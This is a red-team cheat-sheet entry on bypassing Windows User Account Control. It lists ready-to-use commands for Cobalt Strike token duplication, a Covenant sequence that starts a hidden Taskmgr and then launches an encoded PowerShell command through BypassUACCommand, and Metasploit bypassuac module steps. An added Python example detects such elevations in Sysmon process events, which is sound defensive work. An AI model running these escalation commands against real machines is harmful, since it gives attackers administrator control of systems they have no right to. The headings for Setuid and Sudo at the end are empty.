Abuse Elevation Control Mechanism

Bypass User Account Control

CS:

beacon> elevate uac-token-duplication localhost-beacon-name

Covenant:

Create a hidden instance of an auto-elevating process (e.g. Taskmgr.exe or wusa.exe), duplicate and impersonate its token, then bypass UAC:

SharpShell /code:"var startInfo = new System.Diagnostics.ProcessStartInfo { FileName = @\"C:\Windows\System32\Taskmgr.exe\", WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden }; var taskmgr = new System.Diagnostics.Process { StartInfo = startInfo }; taskmgr.Start(); return taskmgr.Id.ToString();"
BypassUACCommand cmd.exe "/c powershell -enc <blah>"
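Both the CS and Covenant commands above rely on duplicating the token of an auto-elevating process and using it to start something else at High integrity. The following is an added detection example, not part of the original notes or of either tool: it assumes Sysmon Event ID 1 (process creation) records with the field names Sysmon uses, and the sample events are constructed for illustration.

```python
"""Flag token-duplication UAC bypass in Sysmon-style process creation events.

Added example (not from the original notes). Assumes Sysmon Event ID 1 fields;
the SAMPLE_EVENTS below are constructed, not captured from a real host.
"""

# Windows auto-elevates these for admin users, so one of them running at High
# integrity under a Medium parent is expected. Any *other* High-integrity
# child of a Medium parent is the shape a duplicated-token launch leaves.
AUTO_ELEVATE_IMAGES = {
    r"c:\windows\system32\taskmgr.exe",
    r"c:\windows\system32\wusa.exe",
}

SAMPLE_EVENTS = [  # constructed records
    {"ProcessGuid": "A", "Image": r"C:\Users\bob\implant.exe",
     "ParentProcessGuid": "0", "IntegrityLevel": "Medium"},
    # hidden auto-elevating helper started by the implant: High is normal here
    {"ProcessGuid": "B", "Image": r"C:\Windows\System32\Taskmgr.exe",
     "ParentProcessGuid": "A", "IntegrityLevel": "High"},
    # cmd.exe created with the duplicated token: High child of a Medium parent
    {"ProcessGuid": "C", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentProcessGuid": "A", "IntegrityLevel": "High"},
    # benign: explorer (Medium) launching notepad (Medium)
    {"ProcessGuid": "D", "Image": r"C:\Windows\explorer.exe",
     "ParentProcessGuid": "0", "IntegrityLevel": "Medium"},
    {"ProcessGuid": "E", "Image": r"C:\Windows\System32\notepad.exe",
     "ParentProcessGuid": "D", "IntegrityLevel": "Medium"},
]


def find_suspicious_elevations(events):
    """Return ProcessGuids of High-integrity processes whose direct parent ran
    at Medium integrity and whose image is not a known auto-elevate binary."""
    by_guid = {e["ProcessGuid"]: e for e in events}
    flagged = []
    for e in events:
        parent = by_guid.get(e["ParentProcessGuid"])
        if parent is None or e["IntegrityLevel"] != "High":
            continue
        if parent["IntegrityLevel"] != "Medium":
            continue
        if e["Image"].lower() in AUTO_ELEVATE_IMAGES:
            continue  # legitimate auto-elevation, not a bypass on its own
        flagged.append(e["ProcessGuid"])
    return flagged


if __name__ == "__main__":
    print(find_suspicious_elevations(SAMPLE_EVENTS))  # ['C']
```

Processes elevated through the consent prompt are created by the AppInfo service (svchost.exe) rather than by the Medium-integrity requester, which is why a High child directly under a Medium parent is a useful signal; extend the allowlist with the auto-elevating binaries your environment legitimately uses.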

Metasploit:

Several bypassuac modules exist under exploit/windows/local/. For example:

search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit

Elevated Execution with Prompt

Setuid and Setgid

Sudo and Sudo Caching
